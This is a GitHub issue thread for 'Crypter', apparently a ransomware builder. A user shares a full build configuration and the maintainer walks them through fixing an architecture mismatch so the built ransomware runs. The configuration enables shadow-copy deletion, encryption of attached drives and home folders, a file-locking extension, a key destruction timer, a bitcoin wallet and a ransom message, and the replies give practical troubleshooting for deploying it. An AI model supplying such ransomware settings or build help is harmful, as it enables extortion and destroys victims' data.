### ISSUE TITLE
You cannot execute this application

### ISSUE THREAD

**Issue by GhostYWP** [sithis993/Crypter#71]
i have this error in my virtualmachine with windows 10 x86.
https://prnt.sc/s7p2gy

what is wrong?
This is Crypter Version 3.0 (latest release)

here my config file

{
      "builder_language": "English",
      "pyinstaller_aes_key": "bRADMAyx8KAB2Aeu",
      "icon_file": "C:\\Users\\CENSURED\\Desktop\\Crypter-master\\build\\Crypter-3.0\\CrypterBuilder\\Resources\\pdf.ico",
      "open_gui_on_login": true,
      "gui_title": "TitleWindow",
      "upx_dir": "C:\\Users\\CENSURED\\Desktop\\Crypter-master\\bin\\upx-3.96-win64",
      "delete_shadow_copies": true,
      "disable_task_manager": false,
      "key_destruction_time": "86400",
      "wallet_address": "CENSURED",
      "bitcoin_fee": "1",
      "encrypt_attached_drives": true,
      "encrypt_user_home": true,
      "max_file_size_to_encrypt": "50",
      "filetypes_to_encrypt": [
            "txt",
            "exe",
            "rar"
      ],
      "encrypted_file_extension": "locked",
      "make_gui_resizeable": true,
      "always_on_top": true,
      "background_colour": [
            177,
            7,
            14,
            255
      ],
      "heading_font_colour": [
            0,
            0,
            0,
            255
      ],
      "primary_font_colour": [
            255,
            255,
            0,
            255
      ],
      "secondary_font_colour": [
            255,
            255,
            255,
            255
      ],
      "ransom_message": "111\n11\n1\n11\n111",
      "debug_level": "3 - High"
}

**Comment by sithis993** [comment]
Hey, sorry you're having a problem. I've seen this before with many applications, not just Crypter, and it's usually because of an architecture mistmatch. So you might be building Crypter on a 64 bit computer/virtual machine, and then trying to execute it on a 32 bit computer/virtual machine.

When the Crypter binary is built, it's built using the architecture of whatever version of Python you're  currently running. So you've most likely installed a 64 bit version of Python, which means that a 64 bit Crypter application is built. This cannot be run on a non 64 bit computer. I'd recommend uninstalling python, and reinstalling the 32 bit version. Then build Crypter again and it should work :-)

**Comment by sithis993** [comment]
Actually, I can see that this is almost certainly the problem, as it looks like you're packing the exe with a 64 bit version of UPX. From your config:

"upx_dir": "C:\Users\CENSURED\Desktop\Crypter-master\bin\upx-3.96-win64",

**Comment by sithis993** [comment]
Hey, any update on this? I'm assuming you've fixed the problem so I'll close this issue later today if I don't see any more messages

**Comment by GhostYWP** [comment]
Thanks you so much, this actually work perfectly! the UDP packer has been x64 arch because my VM throw me an error. Thanks for your time!
